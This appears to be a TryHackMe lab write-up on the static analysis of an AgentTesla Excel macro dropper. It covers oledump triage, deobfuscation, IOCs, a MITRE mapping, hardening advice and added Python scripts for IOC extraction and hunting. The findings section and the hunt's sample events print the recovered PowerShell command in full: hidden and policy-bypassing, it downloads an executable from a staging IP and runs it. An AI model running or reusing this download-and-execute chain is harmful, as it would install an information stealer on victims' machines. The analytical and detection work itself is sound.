Static Analysis: Agent Tesla VBA Dropper

Date: 2026-03-02

Author: Enes Arda Baydaş

Category: Malware Analysis

Platform: TryHackMe (Room: RemnuxVM)


1. Executive Brief

Scenario:

A suspicious Excel file (agenttesla.xlsm) was flagged for analysis. The objective was to perform static analysis to determine if the file contained malicious code, extract any potential Indicators of Compromise (IOCs), and identify the payload delivery mechanism.

Threat Summary:

The analyzed document acts as the initial access vector and downloader for AgentTesla, a well-known .NET-based Remote Access Trojan (RAT) and information stealer. Enabling the embedded macro launches a hidden PowerShell sequence that fetches the AgentTesla payload and runs it. A successful infection risks large-scale credential harvesting and data exfiltration and, where personal data is affected, a mandatory breach notification to the KVKK (Personal Data Protection Authority).

2. The Investigation

Initial Triage & OLE Analysis

The investigation started by listing the OLE streams of the Excel file with oledump.py (oledump.py agenttesla.xlsm) on a REMnux VM. The tool parses the compound-file structure of Office documents, so the streams can be examined without ever opening the document in Excel.

(Screenshot 2026-03-02 195751: oledump.py stream listing)

Observation: Streams A3 and A4 were marked m and M, oledump's flags for VBA macro streams: lowercase m means the stream holds only module attributes, uppercase M means it holds actual macro code. Stream A4 (‘VBA/ThisWorkbook’) was chosen for closer inspection because of its size and because ThisWorkbook is where an auto-executing Workbook_Open() handler lives.

Macro Extraction & Code Analysis

Stream A4 was decompressed with the -s 4 --vbadecompress flags (short form: -s 4 -v). Analysis of the Workbook_Open() handler, which fires as soon as the workbook is opened with macros enabled, revealed a heavily obfuscated variable (Sqtnew). The string had caret (^) and asterisk (*) characters scattered through it to break up the command text, a standard defense evasion technique: the raw stream never contains recognisable tokens such as powershell or Invoke-WebRequest, so static string and signature matching on the file misses it.

(Screenshot 2026-03-02 195536: decompressed Workbook_Open() macro with the Sqtnew string)

The obfuscated string was processed through CyberChef with a “Find / Replace” recipe that strips the junk characters (^ and *). This revealed the underlying PowerShell command, which uses Invoke-WebRequest to download a secondary executable from a remote staging server into %TEMP% and then launches it with Start-Process.
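As an added example (not part of the original write-up or the TryHackMe room material), the Python below does the same job as the CyberChef Find/Replace step and then pulls the IOCs out of the result. The obfuscated input is a constructed approximation: the command recovered in the Findings section with ^ and * inserted, not the sample's actual Sqtnew bytes. It also scores junk-character density, the "anomalous character clustering" cue mentioned in the Reflections, so the same script can be pointed at any decompressed VBA string literal during triage.

```python
import re

# Constructed input for this example: the command recovered in the Findings
# section with caret (^) and asterisk (*) junk inserted, approximating the
# Sqtnew string. It is NOT the sample's actual bytes.
OBFUSCATED_SAMPLE = (
    "p^ow*er^sh*ell -W^indow*Style h^id*den -e^xecution*policy b^yp*ass; "
    "$T^emp*File = [I^O.Pa*th]::G^etTemp*FileName() | R^ename-I*tem -N^ewName "
    "{ $_ -r^eplace 'tm*p$', 'e^xe' } -P^ass*Thru; "
    "I^nvoke-We*bRequest -U^ri \"h^ttp://193.2*03.2^03.67/r^t/Doc-37*37122pdf.e^xe\" "
    "-O^utFile $T*empFile; S^tart-Pro*cess $T^empFile;"
)

JUNK = "^*"   # the characters the CyberChef Find/Replace recipe removed


def deobfuscate(text: str, junk: str = JUNK) -> str:
    """Drop every junk character; equivalent to the CyberChef Find/Replace step."""
    return text.translate({ord(c): None for c in junk})


def junk_density(text: str, junk: str = JUNK) -> float:
    """Share of junk characters in a string. Ordinary VBA string literals sit
    at 0; a value well above that is the 'anomalous clustering' worth flagging
    while reading decompressed macro code."""
    if not text:
        return 0.0
    return sum(1 for c in text if c in junk) / len(text)


URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Tokens whose presence in a command spawned from an Office macro is a
# strong signal on its own (hidden window, policy bypass, download, launch).
SUSPICIOUS_TOKENS = (
    "-windowstyle hidden",
    "-executionpolicy bypass",
    "invoke-webrequest",
    "net.webclient",
    "gettempfilename",
    "start-process",
)


def suspicious_tokens(command: str) -> list:
    """Return the suspicious PowerShell tokens present in a deobfuscated command."""
    low = command.lower()
    return [t for t in SUSPICIOUS_TOKENS if t in low]


def defang(ioc: str) -> str:
    """Make an indicator safe to paste into a report (hxxp, [.])."""
    return ioc.replace("http", "hxxp").replace(".", "[.]")


def extract_iocs(command: str) -> dict:
    """Pull URLs, IPv4 addresses and remote file names out of a command."""
    urls = URL_RE.findall(command)
    ips = sorted(set(IPV4_RE.findall(command)))
    files = sorted({u.rsplit("/", 1)[-1] for u in urls})
    return {
        "urls": [defang(u) for u in urls],
        "ips": [defang(ip) for ip in ips],
        "remote_files": files,
    }


if __name__ == "__main__":
    print(f"junk density before: {junk_density(OBFUSCATED_SAMPLE):.2f}")
    clean = deobfuscate(OBFUSCATED_SAMPLE)
    print(clean)
    print("suspicious tokens:", suspicious_tokens(clean))
    print("IOCs:", extract_iocs(clean))
```

Removing only ^ and * is enough here because the page's sample used exactly those two; a different dropper may mix in other filler or split the command across string concatenations, so confirm the recovered text parses as PowerShell before trusting the extracted IOCs.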

3. Findings & Artifacts

The deobfuscated PowerShell script revealed the following behavior and IOCs:

Script Logic:

powershell -WindowStyle hidden -executionpolicy bypass;
$TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } -PassThru;
Invoke-WebRequest -Uri "http://193.203.203.67/rt/Doc-3737122pdf.exe" -OutFile $TempFile;
Start-Process $TempFile;

MITRE ATT&CK Mapping (TTPs)

| Tactic              | Technique ID | Technique Name                                | Context                                                      |
| ------------------- | ------------ | --------------------------------------------- | ------------------------------------------------------------ |
| Initial Access      | T1566.001    | Phishing: Spearphishing Attachment            | Delivery via malicious .xlsm file.                           |
| Execution           | T1204.002    | User Execution: Malicious File                | Requires the user to enable macros.                          |
| Execution           | T1059.001    | Command and Scripting Interpreter: PowerShell | Executes the payload retrieval script.                       |
| Defense Evasion     | T1027        | Obfuscated Files or Information               | VBA string obfuscation (^, *).                               |
| Command and Control | T1105        | Ingress Tool Transfer                         | Invoke-WebRequest fetches the payload from the staging server. |

Indicators of Compromise (IOCs):

| Type         | Indicator                                           | Context                                                                                                                          |
| ------------ | --------------------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------- |
| File Name    | agenttesla.xlsm                                     | Initial delivery vector.                                                                                                         |
| IPv4 Address | 193[.]203[.]203[.]67                                | Remote staging server.                                                                                                           |
| URL          | hxxp://193[.]203[.]203[.]67/rt/Doc-3737122pdf[.]exe | Payload download location.                                                                                                       |
| File Name    | Doc-3737122pdf.exe                                  | AgentTesla payload as named on the staging server; on disk it is saved under the GetTempFileName() name with the extension changed to .exe (tmpXXXX.exe). |
| File Path    | %TEMP%                                              | Directory the payload is written to and launched from.                                                                           |

4. Remediation & Hardening

Immediate Actions:

  1. Network Block: Add the IP 193[.]203[.]203[.]67 to the firewall and web proxy blocklists right away.
  2. Threat Intelligence: Report the malicious IP to USOM (Ulusal Siber Olaylara Müdahale Merkezi) for national threat sharing.
  3. Endpoint Scan: Query the SIEM/EDR for endpoints that connected to this IP, for powershell.exe spawned by EXCEL.EXE with -WindowStyle hidden or -executionpolicy bypass on the command line, and for executables launched from %TEMP%. Note that Doc-3737122pdf.exe is only the name on the staging server (it will appear in proxy or URL logs); on disk the script saves the payload under the GetTempFileName() name with the extension changed to .exe (tmpXXXX.exe), so hunting endpoints for the original file name alone will miss it.
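Added example (mine, not the write-up's): a small hunt over constructed Sysmon-style process-creation (EventID 1) and network-connection (EventID 3) events, encoding the behaviours the recovered script produces on a host. Field names follow Sysmon; the host names, user name, paths and the benign events are made up for the example, and the rules use only the IOCs and command switches recovered above.

```python
import re

# Constructed Sysmon-style events for this example (field names follow
# Sysmon EventID 1 process creation and EventID 3 network connection);
# host names, user names and the benign activity are made up.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXCEL = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
PAYLOAD = r"C:\Users\ayse\AppData\Local\Temp\tmpA1B2.exe"

SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "WS-01", "Image": EXCEL,
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": '"EXCEL.EXE" C:\\Users\\ayse\\Downloads\\agenttesla.xlsm'},
    {"EventID": 1, "Computer": "WS-01", "Image": PS, "ParentImage": EXCEL,
     "CommandLine": "powershell -WindowStyle hidden -executionpolicy bypass; "
                    "$TempFile = [IO.Path]::GetTempFileName() | Rename-Item "
                    "-NewName { $_ -replace 'tmp$', 'exe' } -PassThru; "
                    "Invoke-WebRequest -Uri \"http://193.203.203.67/rt/Doc-3737122pdf.exe\" "
                    "-OutFile $TempFile; Start-Process $TempFile;"},
    {"EventID": 3, "Computer": "WS-01", "Image": PS,
     "DestinationIp": "193.203.203.67", "DestinationPort": 80},
    {"EventID": 1, "Computer": "WS-01", "Image": PAYLOAD, "ParentImage": PS,
     "CommandLine": PAYLOAD},
    {"EventID": 1, "Computer": "WS-02", "Image": PS,
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell Get-Service -Name Spooler"},
    {"EventID": 3, "Computer": "WS-02",
     "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationIp": "93.184.216.34", "DestinationPort": 443},
]

KNOWN_BAD_IPS = {"193.203.203.67"}          # staging server from the IOC table
OFFICE_APPS = ("excel.exe", "winword.exe", "powerpnt.exe")
# [IO.Path]::GetTempFileName() typically yields %TEMP%\tmpXXXX.tmp (hex
# suffix); the script renames it to .exe, so the payload never runs under
# the name Doc-3737122pdf.exe on the endpoint.
TEMP_EXE_RE = re.compile(r"\\Temp\\tmp[0-9A-F]{1,4}\.exe$", re.IGNORECASE)


def hunt(events: list) -> list:
    """Return (event_index, rule_name) for every event matching a hunt rule."""
    hits = []
    for i, ev in enumerate(events):
        image = ev.get("Image", "")
        parent = ev.get("ParentImage", "").lower()
        cmd = ev.get("CommandLine", "").lower()
        if ev.get("EventID") == 1:
            if image.lower().endswith("powershell.exe") and parent.endswith(OFFICE_APPS):
                hits.append((i, "office_spawned_powershell"))
            if "-windowstyle hidden" in cmd and "-executionpolicy bypass" in cmd:
                hits.append((i, "hidden_bypass_powershell"))
            if "doc-3737122pdf.exe" in cmd or "193.203.203.67" in cmd:
                hits.append((i, "known_ioc_in_command_line"))
            if TEMP_EXE_RE.search(image) and parent.endswith("powershell.exe"):
                hits.append((i, "temp_renamed_exe_from_powershell"))
        elif ev.get("EventID") == 3:
            if ev.get("DestinationIp") in KNOWN_BAD_IPS:
                hits.append((i, "connection_to_staging_ip"))
    return hits


def compromised_hosts(events: list) -> set:
    """Hosts with at least one hit; the list to isolate and image first."""
    return {events[i]["Computer"] for i, _ in hunt(events)}


if __name__ == "__main__":
    for idx, rule in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
    print("hosts to triage:", sorted(compromised_hosts(SAMPLE_EVENTS)))
```

The behavioural rules (Office spawning PowerShell, hidden-window plus policy-bypass switches, a tmpXXXX.exe started from %TEMP% by PowerShell) will keep matching after the attacker rotates the IP and file name; the IOC-based rules are the ones to retire once the campaign moves.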

System Hardening:

  1. Macro Security: Enforce Group Policy Objects (GPO) to “Block macros from running in Office files from the Internet” so that Mark of the Web (MOTW) files cannot run VBA even if the user clicks through the warning; this has been the Office default since 2022, but enforcing it by policy stops users from unblocking it in the Trust Center.
  2. PowerShell Restriction: Set the execution policy to AllSigned where possible, but treat it as a guardrail rather than a security control: the recovered command passes -executionpolicy bypass itself, and that switch overrides the configured policy. Enforce Constrained Language Mode through AppLocker or WDAC, and enable PowerShell Script Block Logging (Event ID 4104) so that deobfuscated commands like this one are captured for the SIEM.

5. Reflections

  • Initial triage demonstrated that simply identifying the presence of a macro is insufficient; tracing the execution flow to the command string assembly is critical.

  • The reliance on simple junk-character insertion for evasion shows that thorough string analysis, not just a scan for known keywords, is required.

  • Future workflows will prioritize early identification of anomalous character clustering (^, *) during VBA static analysis.